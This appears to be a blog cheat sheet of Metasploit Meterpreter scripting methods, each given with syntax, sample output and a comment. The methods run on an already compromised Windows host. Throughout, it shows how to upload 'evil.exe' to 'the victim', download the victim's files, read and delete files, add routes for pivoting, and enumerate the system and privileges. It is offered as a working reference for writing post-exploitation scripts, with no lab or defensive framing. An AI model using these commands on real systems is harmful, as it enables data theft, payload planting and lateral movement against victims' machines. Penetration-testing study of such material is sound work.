This page contains Meterpreter methods with their syntax and output. The aim was to provide a quick reference for the Meterpreter script developer.
Rather than checking the code of already existing Meterpreter scripts and searching for the relevant method, this page can be like a one-stop shop.
Hope this will help newbies and enthusiasts like me who want to start writing their own Meterpreter scripts.
P.S.: Not all the methods are covered, as this is all I can do in 3 hours. More to update soon :)
Get all the files/folders in a directory
Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of the present working directory.
Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of the C drive.
Get all the files/folders in a directory along with extra information
Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of the present working directory.
Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of the C drive.
Change the directory
Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to the C drive.
Make directory
Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in the C drive.
Get current working directory
Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Delete a directory
Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Download contents of a target directory
Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the files inside the oldman directory of the victim and save them inside the oldmanlab directory of the attacker's system.
Upload contents of a local directory to the victim's system
Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside the oldmanlab directory of the attacker to the oldman directory of the victim's system.
Get the file separator
Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for Windows, / for Unix).
Search for the specified file
Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories
Get the basename for the specified file
Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.
Expand path of the directory
Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will give the absolute path of the shortcut specified
Get the md5 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file
Get the sha1 of file
Syntax: client.fs.file.sha1("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
Check if specified file exists
Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false
Delete specified file
Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.
Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.
Upload file to the victim's system
Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from the attacker's system to the victim's oldman directory.
Download file from the victim's system
Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from the victim's system and save it to the attacker's root directory.
Open a file in read mode and copy the content to some variable
Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
temp = ""
# read until end of file, appending each chunk to temp
until file1.eof?
  temp << file1.read
end
file1.close
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in the temp variable.
List all the available interfaces on the victim's system
Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of all the interfaces available on the victim's system along with details like IP, netmask, mac_address etc.
Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return the first interface available on the victim's system along with details like IP, netmask, mac_address etc.
Get the IP address of specified interface
Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.
List all the routes available on the victim's system
Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available on the victim's system along with details like subnet, netmask, gateway.
Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return the first route available on the victim's system along with details like subnet, netmask, gateway.
Add a route on the victim's system
Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add a route on the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.
Remove specified route from the victim's system
Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove a route from the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.
Get the user id
Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.
Get the victim's computer name
Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.
Get the victim's operating system name and version
Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the name of the operating system running on the compromised system.
Get the victim's operating system architecture
Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86, 64-bit) of the operating system running on the compromised system.
Get the victim's operating system language
Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give the operating system language of the compromised system.
Revert to previous user privileges
Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let's say we had changed privileges from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM"; then revert to self will change our privileges back to "NT AUTHORITY\\oldmanlab".
Source - http://oldmanlab.blogspot.kr/p/meterpreter-api-cheat-sheet.html